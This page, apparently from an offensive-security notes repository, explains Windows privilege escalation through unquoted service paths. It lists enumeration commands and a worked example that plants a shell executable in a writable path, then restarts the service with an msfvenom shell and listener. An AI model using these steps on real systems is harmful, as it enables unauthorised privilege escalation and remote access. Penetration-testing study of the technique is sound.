whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/exploit/windows/docs/unquoted_path.md

1.2 KiB
Raw Blame History

Unquoted Path

  • Path to a service without quotes can be hijacked by inserting other executables and services into the path.
  • Some part of path has to be writeable, windows tries to insert .exe instead of a space.
  • Check services via wmic service get name,displayname,pathname,startmode and sc qc <servicename>
  • Check permissions on paths via .\accesschk64.exe /accepteula -uwdq "C:\Service Path\"

Example

  • The unqoted path is C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"

net start <service>

Intel about Service

  • Access should contain writeable
Get-Acl -Path <path> | Format-List

  • Save the script Get-ServiceAcl.ps1 and Import-Module Get-ServiceAcl.ps1

  • Check ServiceRights via

"<servicename>" | Get-ServiceAcl | select ExpandProperty Access

Interacting with the Service

  • Upload msfvenom shell to the writeable path, setup listener and
sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"